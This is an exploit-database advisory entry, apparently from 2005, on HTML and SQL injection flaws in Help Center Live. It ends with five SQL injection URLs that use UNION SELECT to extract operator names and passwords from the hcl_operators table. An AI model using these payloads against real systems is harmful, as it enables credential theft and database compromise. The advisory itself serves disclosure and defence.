Help Center Live Multiple Input Validation Vulnerabilities

vendor:

Help Center Live

by:

SecurityFocus

7.5

CVSS

HIGH

Multiple HTML Injection and SQL Injection

89, 89, 89, 89, 89, 89, 89, 89

CWE

Product Name: Help Center Live

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

Help Center Live Multiple Input Validation Vulnerabilities

Help Center Live is prone to multiple input validation vulnerabilities due to a failure in the application to properly sanitize user-supplied input. Attacker-supplied HTML and script code would be able to access properties of the site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible. Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

Mitigation:

Upgrade to the latest version of Help Center Live.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/13666/info

Help Center Live is prone to multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

Reportedly the application is affected by multiple HTML injection vulnerabilities. Attacker-supplied HTML and script code would be able to access properties of the site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.

The application is also affected by multiple SQL injection vulnerabilities. Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

These issues have reportedly been addressed in the latest release of Help Center Live, this information has not been confirmed by Symantec or the vendor. 

http://www.example.com/support/faq/index.php?x=f&id=-99'%20UNION%20SELECT%200,
0,operator,password%20FROM%20hcl_operators%20WHERE%201/*

http://www.example.com/support/tt/view.php?tid=-99'%20UNION%20SELECT%200,0,0,
operator,password,0,0,0,0,0%20FROM%20hcl_operators%20WHERE%201/*

http://www.example.com/support/tt/download.php?fid=-99'%20UNION%20SELECT%200,0,0,
password,0,operator,0,0%20FROM%20hcl_operators%20WHERE%20id='1

http://www.example.com/support/lh/icon.php?status=-99' UNION SELECT
password,password FROM hcl_operators WHERE id=1/*

http://www.example.com/support/lh/chat_download.php?fid=-99' UNION
SELECT password,operator,password FROM hcl_operators WHERE id=1/*